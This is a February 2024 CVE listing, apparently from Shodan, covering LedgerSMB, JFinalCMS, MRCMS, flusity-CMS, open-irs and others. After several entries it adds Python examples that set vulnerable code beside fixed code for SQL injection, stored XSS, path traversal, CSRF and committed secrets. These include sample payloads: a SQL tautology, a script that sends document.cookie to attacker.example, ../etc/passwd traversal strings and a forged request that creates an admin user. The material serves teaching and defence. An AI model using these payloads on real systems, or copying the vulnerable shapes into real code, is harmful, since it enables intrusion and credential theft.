Security Vulnerabilities - CVEs Published In February 2024
LedgerSMB is a free web-based double-entry accounting system. When a LedgerSMB database administrator has an active session in /setup.pl, an attacker can trick the admin into clicking on a link which automatically submits a request to setup.pl without the admin's consent. This request can be used to create a new user account with full application (/login.pl) privileges, leading to privilege escalation. The vulnerability is patched in versions 1.10.30 and 1.11.9.
CVSS Score
7.5
EPSS Score
0.002
Published
2024-02-02
JFinalCMS 5.0.0 is vulnerable to SQL injection via /admin/content/data.
CVSS Score
9.8
EPSS Score
0.001
Published
2024-02-02
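The JFinalCMS entry above names only the endpoint, not the injectable parameter. The following is an added example, not JFinalCMS code (which is Java): a Python/SQLite content listing with an assumed `title` filter that shows the vulnerable string-splicing shape beside the parameterised fix, using a constructed in-memory table.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory table standing in for a CMS content store; not JFinalCMS's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO content (title, published) VALUES (?, ?)",
        [("Welcome", 1), ("Draft roadmap", 0), ("Internal pricing", 0)],
    )
    conn.commit()
    return conn


def list_content_vulnerable(conn: sqlite3.Connection, title_filter: str) -> list:
    # Vulnerable shape: the request parameter is spliced into the SQL text, so a quote
    # character in it changes the query's structure instead of being treated as data.
    sql = (
        "SELECT title FROM content WHERE published = 1 "
        f"AND title LIKE '%{title_filter}%'"
    )
    return [row[0] for row in conn.execute(sql)]


def list_content_safe(conn: sqlite3.Connection, title_filter: str) -> list:
    # Fixed shape: the driver binds the value as a parameter; the filter can never
    # alter the query, only the value that LIKE compares against.
    sql = (
        "SELECT title FROM content WHERE published = 1 "
        "AND title LIKE '%' || ? || '%'"
    )
    return [row[0] for row in conn.execute(sql, (title_filter,))]


# Classic tautology payload: closes the string literal, ORs in a true predicate,
# and comments out the rest of the original query.
PAYLOAD = "' OR 1=1 --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", list_content_vulnerable(db, PAYLOAD))  # all rows, unpublished included
    print("safe:      ", list_content_safe(db, PAYLOAD))        # no row has that literal title
```

Parameterisation stops structural injection; it does not stop `%` and `_` in the value from acting as LIKE wildcards, which is a separate input-validation concern.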
MRCMS 3.0 contains a Cross-Site Scripting (XSS) vulnerability via /admin/system/saveinfo.do.
CVSS Score
5.4
EPSS Score
0.001
Published
2024-02-02
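A "save info" handler that stores site settings and later renders them is the usual shape of a stored XSS like the MRCMS one above. The following is an added example, not MRCMS code (which is Java): a Python rendering of an assumed site name and site URL setting, vulnerable and fixed, with a constructed payload.

```python
import html
from urllib.parse import urlsplit

# Constructed payloads of the kind a "save site info" form might carry;
# attacker.example is a placeholder host, not from the advisory.
MALICIOUS_SITE_NAME = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
MALICIOUS_URL = "javascript:alert(document.cookie)"


def render_site_header_vulnerable(site_name: str, site_url: str) -> str:
    # Vulnerable shape: stored settings are interpolated verbatim into the page,
    # so whoever could write them (or forge the write) runs script in every admin's browser.
    return f'<h1>{site_name}</h1><a href="{site_url}">home</a>'


def safe_url(site_url: str) -> str:
    # Escaping does not neutralise javascript: or data: URLs inside href,
    # so the scheme is allow-listed separately. Anything else degrades to "#".
    scheme = urlsplit(site_url.strip()).scheme.lower()
    return site_url if scheme in ("http", "https") else "#"


def render_site_header_safe(site_name: str, site_url: str) -> str:
    # Escape for the element-text context and, with quote=True, for the attribute context.
    return (
        f"<h1>{html.escape(site_name)}</h1>"
        f'<a href="{html.escape(safe_url(site_url), quote=True)}">home</a>'
    )


if __name__ == "__main__":
    print(render_site_header_vulnerable(MALICIOUS_SITE_NAME, MALICIOUS_URL))
    print(render_site_header_safe(MALICIOUS_SITE_NAME, MALICIOUS_URL))
```

Escaping must match the output context: the text inside `<h1>` and the value inside `href="..."` need different treatment, and a URL-valued attribute needs a scheme check on top of escaping.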
MRCMS 3.0 contains an Arbitrary File Read vulnerability in /admin/file/edit.do as the incoming path parameter is not filtered.
CVSS Score
7.5
EPSS Score
0.001
Published
2024-02-02
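An unfiltered path parameter joined onto a base directory, as in the MRCMS file-read entry above, is the classic traversal shape. The following is an added example, not MRCMS code: a Python containment check against an assumed `/srv/cms/templates` root, beside the vulnerable join, showing why `os.path.join` alone is not a guard.

```python
import posixpath

# Assumed document root for the file editor; not MRCMS's real layout.
FILE_ROOT = "/srv/cms/templates"


class UnsafePath(ValueError):
    """Raised when a requested path would leave FILE_ROOT."""


def vulnerable_target(requested: str) -> str:
    # Vulnerable shape: the request's path parameter is joined straight onto the root and opened.
    # '..' segments walk out of the root, and join() discards the root entirely when the
    # second argument is absolute.
    return posixpath.normpath(posixpath.join(FILE_ROOT, requested))


def resolve_under_root(root: str, requested: str) -> str:
    """Return the normalised absolute path for `requested`, or raise UnsafePath.

    Rejects NUL bytes and backslashes, absolute paths, and any path whose
    normalised form ('..' and '.' collapsed) is not inside `root`.
    posixpath is used so the check is deterministic without a filesystem; in a
    real handler also pass root and the opened path through os.path.realpath so
    that a symlink inside the root cannot point back out of it.
    """
    if "\x00" in requested or "\\" in requested:
        raise UnsafePath("forbidden character in path")
    if posixpath.isabs(requested):
        raise UnsafePath("absolute paths are not allowed")
    candidate = posixpath.normpath(posixpath.join(root, requested))
    # commonpath, not str.startswith: '/srv/cms/templates_private' starts with the
    # root string but is not inside the root directory.
    if posixpath.commonpath([root, candidate]) != root:
        raise UnsafePath("path escapes the file root")
    return candidate


def is_safe(requested: str) -> bool:
    try:
        resolve_under_root(FILE_ROOT, requested)
        return True
    except UnsafePath:
        return False


if __name__ == "__main__":
    for p in ("index.html", "../../../etc/passwd", "/etc/passwd", "../templates_private/x"):
        print(f"{p!r}: vulnerable opens {vulnerable_target(p)!r}, safe={is_safe(p)}")
```

Normalise first, then compare with `commonpath`; a prefix string comparison or a blocklist of `../` substrings is bypassable by sibling-directory names and by encoding variants that the web framework decodes before the handler sees them.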
Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the update_post.php component.
CVSS Score
8.8
EPSS Score
0.008
Published
2024-02-02
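Both the LedgerSMB `/setup.pl` entry and the flusity-CMS `update_post.php` entry above are the same failure: a state-changing admin action authorised by nothing but the ambient session cookie. The following is an added example serving both entries, not code from either project: a Python handler in its vulnerable shape and with an Origin check plus a session-bound CSRF token, driven by constructed requests. The origin `https://cms.example` and the form fields are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed deployment origin of the application; not from either advisory.
SITE_ORIGIN = "https://cms.example"

SESSIONS = {}                      # session id -> {"user": ..., "csrf": per-session token}
USERS = {"admin": {"role": "admin"}}


class Forbidden(Exception):
    pass


def login(user: str) -> str:
    """Create a session and a CSRF token bound to it; returns the session cookie value."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    # The application embeds this in its own forms as a hidden field; a page on
    # another origin cannot read it, so it cannot forge a request that carries it.
    return SESSIONS[sid]["csrf"]


def same_origin(header_value: str) -> bool:
    parts = urlsplit(header_value)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def create_user_vulnerable(request: dict) -> str:
    # Vulnerable shape: the only authorisation evidence is the session cookie, which the
    # victim's browser attaches to a form submission regardless of which site made it.
    sid = request["cookies"].get("session")
    if sid not in SESSIONS:
        raise Forbidden("not logged in")
    name = request["form"]["username"]
    USERS[name] = {"role": request["form"]["role"]}
    return name


def create_user_safe(request: dict) -> str:
    sid = request["cookies"].get("session")
    if sid not in SESSIONS:
        raise Forbidden("not logged in")
    # 1. Origin (falling back to Referer) must name this site; missing headers fail closed.
    origin = request["headers"].get("Origin") or request["headers"].get("Referer") or ""
    if not same_origin(origin):
        raise Forbidden("cross-site request")
    # 2. The submitted token must equal the one bound to this session (constant-time compare).
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), SESSIONS[sid]["csrf"].encode()):
        raise Forbidden("missing or wrong CSRF token")
    name = request["form"]["username"]
    USERS[name] = {"role": request["form"]["role"]}
    return name


def forged_request(sid: str) -> dict:
    # Constructed: what the admin's browser sends when an attacker's page auto-submits a
    # form to the admin endpoint. The cookie rides along, Origin is the attacker's, no token.
    return {
        "cookies": {"session": sid},
        "headers": {"Origin": "https://attacker.example"},
        "form": {"username": "backdoor", "role": "admin"},
    }


def legitimate_request(sid: str) -> dict:
    # Constructed: the same action submitted from the application's own form.
    return {
        "cookies": {"session": sid},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"username": "alice", "role": "user", "csrf_token": csrf_token_for(sid)},
    }


def outcome(handler, request: dict) -> str:
    try:
        return "created:" + handler(request)
    except Forbidden as exc:
        return "forbidden:" + str(exc)


if __name__ == "__main__":
    sid = login("admin")
    print(outcome(create_user_vulnerable, forged_request(sid)))   # created:backdoor
    print(outcome(create_user_safe, forged_request(sid)))         # forbidden:cross-site request
    print(outcome(create_user_safe, legitimate_request(sid)))     # created:alice
```

A `SameSite=Lax` session cookie stops browsers from attaching the cookie to most cross-site POSTs and is worth setting, but it mitigates rather than replaces the token check, and GET endpoints that change state remain exposed under Lax.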
open-irs is an issue response robot that responds to issues in the installed repository. The `.env` file was accidentally uploaded when working with GitHub Actions. This problem is fixed in 1.0.1, which retires all of the exposed sensitive keys and moves them into secrets.
CVSS Score
7.6
EPSS Score
0.001
Published
2024-02-02
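The open-irs entry above is a committed `.env` file. The following is an added example, not open-irs code: a Python pre-commit check that flags a tracked `.env`-style file and any sensitive-looking `KEY=value` line whose value is not a placeholder or a reference to a secret store, run over a constructed staging set. The name patterns and placeholder list are assumptions to tune per project.

```python
import re
from pathlib import PurePosixPath

# Heuristics are assumptions to tune per project, not a published rule set.
SENSITIVE_KEY = re.compile(r"(?i)(secret|token|password|passwd|api_?key|private_?key)")
ASSIGNMENT = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$")
PLACEHOLDER_VALUES = {"", "changeme", "<redacted>", "xxx", "your-key-here"}
ENV_FILE_EXEMPT_SUFFIXES = (".example", ".sample", ".template")


def is_placeholder(value: str) -> bool:
    v = value.strip().strip("'\"")
    # ${VAR} and ${{ secrets.X }} are references to a secret store, which is where the
    # value belongs; an empty or obviously dummy value is fine to commit as well.
    return v.lower() in PLACEHOLDER_VALUES or (v.startswith("${") and v.endswith("}"))


def find_committed_secrets(staged: dict) -> list:
    """Scan {path: text} of files about to be committed.

    Flags any tracked .env-style file outright (reported as line 0), and any
    KEY=value line in any file whose key looks sensitive and whose value is not
    a placeholder. Returns a list of (path, line_no, key) findings.
    """
    findings = []
    for path, content in staged.items():
        name = PurePosixPath(path).name
        if (name == ".env" or name.startswith(".env.")) and not name.endswith(ENV_FILE_EXEMPT_SUFFIXES):
            findings.append((path, 0, "env-file-tracked"))
        for line_no, line in enumerate(content.splitlines(), 1):
            if line.lstrip().startswith("#"):
                continue
            match = ASSIGNMENT.match(line)
            if not match:
                continue
            key, value = match.group(1), match.group(2)
            if SENSITIVE_KEY.search(key) and not is_placeholder(value):
                findings.append((path, line_no, key))
    return findings


# Constructed staging area; every value is made up for the example, not a real credential.
STAGED = {
    ".env": "GITHUB_TOKEN=ghp_madeupvalueforthisexample\nLOG_LEVEL=debug\n",
    ".env.example": "GITHUB_TOKEN=\nLOG_LEVEL=info\n",
    ".github/workflows/respond.yml": "env:\n  GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n",
    "config.py": 'API_KEY = "madeup-for-example"\nTIMEOUT = 30\n',
}


if __name__ == "__main__":
    import sys
    hits = find_committed_secrets(STAGED)
    for path, line_no, key in hits:
        print(f"{path}:{line_no}: {key}")
    sys.exit(1 if hits else 0)
```

To wire it into a hook, build the `staged` mapping from `git diff --cached --name-only` and `git show :<path>`. Note the remediation order the advisory implies: a key that has been pushed must be treated as compromised and replaced even after the file is removed from history, because the commit may already have been cloned or indexed.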
An unchecked return value vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow local authenticated administrators to place the system in a state that could lead to a crash or other unintended behaviors via unspecified vectors. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later; QuTS hero h5.1.5.2647 build 20240118 and later.
CVSS Score
3.4
EPSS Score
0.0
Published
2024-02-02
Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.
CVSS Score
7.5
EPSS Score
0.0
Published
2024-02-02
A potential buffer overflow exists in the Bluetooth LE HCI CPC sample application in the Gecko SDK, which may result in a denial of service or remote code execution.
CVSS Score
7.5
EPSS Score
0.032
Published
2024-02-02
A vulnerability classified as problematic has been found in Nsasoft NBMonitor Network Bandwidth Monitor 1.6.5.0. This affects an unknown part of the component Registration Handler. The manipulation leads to denial of service. The attack must be carried out locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252675. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
CVSS Score
3.3
EPSS Score
0.0
Published
2024-02-02


Shodan ® - All rights reserved